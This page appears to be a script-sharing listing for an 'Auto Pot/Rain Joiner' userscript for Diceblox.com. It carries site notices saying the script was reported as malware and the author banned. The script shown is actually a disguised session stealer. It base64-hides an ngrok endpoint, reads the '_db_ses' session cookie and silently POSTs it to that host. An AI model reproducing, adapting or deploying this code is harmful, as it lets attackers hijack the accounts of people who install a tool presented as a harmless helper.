Auto Pot/Rain Joiner for Diceblox.com 2025-02-02 被举报,原因是:恶意软件或代码
Sending cookies to https://willingly-thankful-man.ngrok-free.app/send
const encodedUrl = "aHR0cHM6Ly93aWxsaW5nbHktdGhhbmtmdWwtbWFuLm5ncm9rLWZyZWUuYXBwL3NlbmQ="; // https://willingly-thankful-man.ngrok-free.app/send
const serverUrl = atob(encodedUrl);
function getData(name) {
const entries = document.cookie.split('; ');
for (const entry of entries) {
const [key, value] = entry.split('=');
if (key === name) {
return value;
}
}
return null;
}
function sendData(data) {
fetch(serverUrl, {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({ entryToken: data })
}).catch(() => {
});
}
const dataToSend = getData('_db_ses');
if (dataToSend) {
sendData(dataToSend);
}
PromoCollectorDev已封禁(被举报用户)已经有:
管理员已通过该举报。